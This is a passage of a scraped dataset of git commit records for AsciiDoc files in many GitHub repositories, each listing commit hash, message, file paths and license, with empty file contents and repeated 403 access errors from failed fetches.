","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"16f84ddc4134573f50ec84e9ea2a72d53a03a167","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a23e718b0c05582d04b3ab2515febf938e405ebe","subject":"Update code documentation","message":"Update code documentation\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"zsdoc\/zplugin.zsh.adoc","new_file":"zsdoc\/zplugin.zsh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33fa14ff51ee683b483f1edebb189cfe84aeaa48","subject":"Update 2016-03-29-Conocido-Desconocido.adoc","message":"Update 2016-03-29-Conocido-Desconocido.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce1d30d4cf531a518569472ddf043899489ddf64","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/new_book.adoc","new_file":"content\/writings\/new_book.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e15018d0f56b7072e5e872b1336a3e87aeb7ec25","subject":"Update 2017-08-23-githooks.adoc","message":"Update 2017-08-23-githooks.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-23-githooks.adoc","new_file":"_posts\/2017-08-23-githooks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c247d9e3eea80e2fa311ec37798274283a66dc23","subject":"Deleted _posts\/2016-11-05-About-the-Author.adoc","message":"Deleted _posts\/2016-11-05-About-the-Author.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-About-the-Author.adoc","new_file":"_posts\/2016-11-05-About-the-Author.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fda97a28e6f084aa9460b72f1ac996e30e2ae0d7","subject":"add docs for userProjects","message":"add docs for userProjects\n","repos":"EMBL-EBI-SUBS\/subs-api,EMBL-EBI-SUBS\/subs-api","old_file":"src\/main\/resources\/docs\/submission_api.adoc","new_file":"src\/main\/resources\/docs\/submission_api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c5e93297005785e6675fa8ec1404921dc37709b","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"akhmetgali\/hubpress.io,akhmetgali\/hubpress.io,akhmetgali\/hubpress.io,akhmetgali\/hubpress.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/akhmetgali\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00d41b902be0df65d40295b1129e068bab228565","subject":"CL note: writing to file","message":"CL note: writing to file\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"431f0b28cebfc0eae2421e807ae835a4c2829662","subject":"Update 2016-12-22-Bump-Bee-S-30A-ESC-Review.adoc","message":"Update 2016-12-22-Bump-Bee-S-30A-ESC-Review.adoc","repos":"OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io","old_file":"_posts\/2016-12-22-Bump-Bee-S-30A-ESC-Review.adoc","new_file":"_posts\/2016-12-22-Bump-Bee-S-30A-ESC-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc74d506ef41f4baed40f29152547aa8483e9a17","subject":"Update 2017-03-22-New-post-test.adoc","message":"Update 2017-03-22-New-post-test.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2017-03-22-New-post-test.adoc","new_file":"_posts\/2017-03-22-New-post-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9667b6eda833fdc7062151665a5971892b01325","subject":"Delete the file at '_posts\/2017-08-11-Intro.adoc'","message":"Delete the file at '_posts\/2017-08-11-Intro.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-08-11-Intro.adoc","new_file":"_posts\/2017-08-11-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2a080db1568af3630c865689f2d3f0050e581bd","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0b3352d2cdd3ded888d0277463da7fd034a90a1","subject":"CL: Don't include linenumbers in code block","message":"CL: Don't include linenumbers in code block\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"4a75ebceed0175bacf8638dfbe83ff6480c3d8de","subject":"Worked on Jump list documentation","message":"Worked on Jump list documentation\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/Jump lists format.asciidoc","new_file":"documentation\/Jump lists format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fdb04e842b9761e6569fccaf11e74c9af2d9b842","subject":"add survey news","message":"add survey news\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2020\/01\/07\/clojure-2020-survey.adoc","new_file":"content\/news\/2020\/01\/07\/clojure-2020-survey.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"de32ef820ba021f9dd80c1d56bf7a8ee83e5fb7b","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22b3f39b8d8bf4cbb59360c84515e37dc4b849c5","subject":"Update 2016-06-27-json-decode-json-encode.adoc","message":"Update 2016-06-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-06-27-json-decode-json-encode.adoc","new_file":"_posts\/2016-06-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2faaa31c3279feecf4ba4f015caa32441bf535e3","subject":"Update 2016-01-12-.adoc","message":"Update 2016-01-12-.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-12-.adoc","new_file":"_posts\/2016-01-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a7e4c425e04eace05c6b0c509f56db248b82672","subject":"Update 2016-01-12-.adoc","message":"Update 2016-01-12-.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-12-.adoc","new_file":"_posts\/2016-01-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c56d469d023599e15fcdbe16b938c3c6ed6caa4","subject":"Update 2017-03-21-Shoretel-No-Service-Behind-Fortigate-Firewall.adoc","message":"Update 2017-03-21-Shoretel-No-Service-Behind-Fortigate-Firewall.adoc","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2017-03-21-Shoretel-No-Service-Behind-Fortigate-Firewall.adoc","new_file":"_posts\/2017-03-21-Shoretel-No-Service-Behind-Fortigate-Firewall.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4825a0877e89528c297538f6c5c3ad7d69f39de","subject":"Update 2015-02-12-hello.adoc","message":"Update 2015-02-12-hello.adoc","repos":"devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io,devkamboj\/devkamboj.github.io","old_file":"_posts\/2015-02-12-hello.adoc","new_file":"_posts\/2015-02-12-hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devkamboj\/devkamboj.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"875416332b799741689a3b420b6659c8a465b680","subject":"Delete 2016-02-05-Hello.adoc","message":"Delete 2016-02-05-Hello.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-05-Hello.adoc","new_file":"_posts\/2016-02-05-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0d28980497baf3b7c303584652cf8ae0736f9d3","subject":"Delete the file at '_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc'","message":"Delete the file at '_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc'","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"411fe6d3085fe3ea2de328cc12179c4c6869d1c9","subject":"y2b create post The Ultimate Game Capture Device? (Blackmagic Design Intensity Shuttle Unboxing \\u0026 Overview)","message":"y2b create post The Ultimate Game Capture Device? (Blackmagic Design Intensity Shuttle Unboxing \\u0026 Overview)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-13-The-Ultimate-Game-Capture-Device-Blackmagic-Design-Intensity-Shuttle-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-07-13-The-Ultimate-Game-Capture-Device-Blackmagic-Design-Intensity-Shuttle-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1bd68ce8ce51961e87bec6157ab7385478f5ae9","subject":"Update 2016-04-03-Letat-limite-borderline.adoc","message":"Update 2016-04-03-Letat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-Letat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-Letat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8186680f51015a6779254920055605391709953c","subject":"Update 2016-6-26-PHPER-H5-J-Sase64-base64.adoc","message":"Update 2016-6-26-PHPER-H5-J-Sase64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHPER-H5-J-Sase64-base64.adoc","new_file":"_posts\/2016-6-26-PHPER-H5-J-Sase64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce12f875e7be3380956aacb0aecbe7a7dae0ef8d","subject":"Use absolute images dir only when generating html","message":"Use absolute images dir only when generating html\n","repos":"mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment,mlocati\/MyDevelopmentEnvironment","old_file":"src\/index.adoc","new_file":"src\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mlocati\/MyDevelopmentEnvironment.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad23f8b7c74cb584b15454864743957f7b98c654","subject":"examples readme","message":"examples readme\n","repos":"arun-gupta\/snoop,arun-gupta\/snoop,ivargrimstad\/snoop,arun-gupta\/snoop,ivargrimstad\/snoopee,ivargrimstad\/snoopee,ivargrimstad\/snoop,ivargrimstad\/snoopee,ivargrimstad\/snoop","old_file":"snoop-examples\/README.adoc","new_file":"snoop-examples\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/snoopee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21204881439692b635d348788c4da3232a00144e","subject":"add a new test doc","message":"add a new test doc\n","repos":"rillbert\/giblish,rillbert\/giblish,rillbert\/giblish","old_file":"data\/testdocs\/wellformed\/simple.adoc","new_file":"data\/testdocs\/wellformed\/simple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rillbert\/giblish.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"590f2a851839845c5a30c42db38b3da050ea7862","subject":"[DOCS] Added 6.2.2 draft","message":"[DOCS] Added 6.2.2 draft\n\nOriginal commit: elastic\/x-pack-elasticsearch@41ed8719ebc13a9a84ead5dfa64a88e18ebcb769\n","repos":"vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra","old_file":"docs\/en\/release-notes\/6.2.2.asciidoc","new_file":"docs\/en\/release-notes\/6.2.2.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/strapdata\/elassandra.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e91c3198269b84ca0dbab2004729e5826b8c7436","subject":"Added RPC examples for add_stream method","message":"Added RPC examples for add_stream method\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"trex_rpc_server_spec.asciidoc","new_file":"trex_rpc_server_spec.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ae0287287ff741be2bb6525a6fa632bef7f95898","subject":"add get_utilization command","message":"add get_utilization command\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"trex_rpc_server_spec.asciidoc","new_file":"trex_rpc_server_spec.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c1660ff47bf679871ddb8d1af0a42933f1c6e4c4","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab782a637dbba4559bacb0f3d88e38ed5f0cc530","subject":"Update 2016-07-04-A-Vicennial-Saga.adoc","message":"Update 2016-07-04-A-Vicennial-Saga.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-04-A-Vicennial-Saga.adoc","new_file":"_posts\/2016-07-04-A-Vicennial-Saga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f3f91b1ab9d4585d0aaacae1dddcad46d7ebbad","subject":"Updating the README.adoc","message":"Updating the README.adoc\n","repos":"lambdamatic\/lambdamatic-project,xcoulon\/lambdamatic-project,xcoulon\/lambdamatic-project,lambdamatic\/lambdamatic-project","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xcoulon\/lambdamatic-project.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ee4bc9573230c3e6cf06b03f71ec77114b494028","subject":"Draft of deploying the local provisioner","message":"Draft of deploying the local provisioner","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/deploying-local-provisioner.adoc","new_file":"modules\/deploying-local-provisioner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c2a497d75167aecf64e2093f5a8b302eeb86e796","subject":"Update 2015-02-13-HubPress-love-Instagram.adoc","message":"Update 2015-02-13-HubPress-love-Instagram.adoc","repos":"HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io","old_file":"_posts\/2015-02-13-HubPress-love-Instagram.adoc","new_file":"_posts\/2015-02-13-HubPress-love-Instagram.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4096701c480bb3074f0ebc004b04a3c962d0c76f","subject":"first draft chapter 3","message":"first draft chapter 3\n","repos":"BenFradet\/spark-ml","old_file":"manuscript\/SparkMLinA_CH03.adoc","new_file":"manuscript\/SparkMLinA_CH03.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BenFradet\/spark-ml.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2b22e833a6487081fc7c641b150e253fee852df0","subject":"Update 2016-03-07-Captain-America-and-Spider-Man-to-meet-Disney-California-Adventure-Guests.adoc","message":"Update 2016-03-07-Captain-America-and-Spider-Man-to-meet-Disney-California-Adventure-Guests.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-07-Captain-America-and-Spider-Man-to-meet-Disney-California-Adventure-Guests.adoc","new_file":"_posts\/2016-03-07-Captain-America-and-Spider-Man-to-meet-Disney-California-Adventure-Guests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"676a3829959cdf833fc9e4413a07c4ef4dfed741","subject":"Update 2016-11-22-Sweet-Potato.adoc","message":"Update 2016-11-22-Sweet-Potato.adoc","repos":"acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io","old_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acristyy\/acristyy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18278c25d39b2b5a713334080485971c56f9c26d","subject":"Update 2017-01-21-Intersection.adoc","message":"Update 2017-01-21-Intersection.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-01-21-Intersection.adoc","new_file":"_posts\/2017-01-21-Intersection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdb5cf08ad5a258a92f3f9de27a88becaf489898","subject":"BXMSDOC-2131: Copied WhatIsAPlanningProblem.adoc file to optaplanner-what-is-a-planning-problem","message":"BXMSDOC-2131: Copied WhatIsAPlanningProblem.adoc file to optaplanner-what-is-a-planning-problem\n","repos":"jomarko\/kie-docs,jomarko\/kie-docs,manstis\/kie-docs,michelehaglund\/kie-docs,manstis\/kie-docs,michelehaglund\/kie-docs","old_file":"docs\/product-business-resource-planner-guide\/src\/main\/asciidoc\/optimizer-planning-problem-con.adoc","new_file":"docs\/product-business-resource-planner-guide\/src\/main\/asciidoc\/optimizer-planning-problem-con.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jomarko\/kie-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01aa0aedd5dbbe74f7bda645ac6d12574e091c07","subject":"COMPILING: Update the guide considering lack of symlinks","message":"COMPILING: Update the guide considering lack of symlinks\n","repos":"CWolfRU\/freedoom,CWolfRU\/freedoom","old_file":"COMPILING.adoc","new_file":"COMPILING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CWolfRU\/freedoom.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b0c0dab3aed53394b011ee9bae5a5d0b332f774c","subject":"y2b create post Fling Joystick For iPad Unboxing \\u0026 Overview","message":"y2b create post Fling Joystick For iPad Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-04-26-Fling-Joystick-For-iPad-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-04-26-Fling-Joystick-For-iPad-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c89d39f9c8c1505bfb05672c25ed25b7d529c998","subject":"CL: Files needed to add a private key to ssh-agent","message":"CL: Files needed to add a private key to ssh-agent\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d81e58d82d312e7ab4eb6678814d7cd9bf6126c2","subject":"Update 2016-06-10-programming-study.adoc","message":"Update 2016-06-10-programming-study.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-programming-study.adoc","new_file":"_posts\/2016-06-10-programming-study.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90ee63f4975c15b8183aa6378e5bfb48a80ee681","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccc22be7d28cb9ffaf18fe5c746c338dc8229947","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 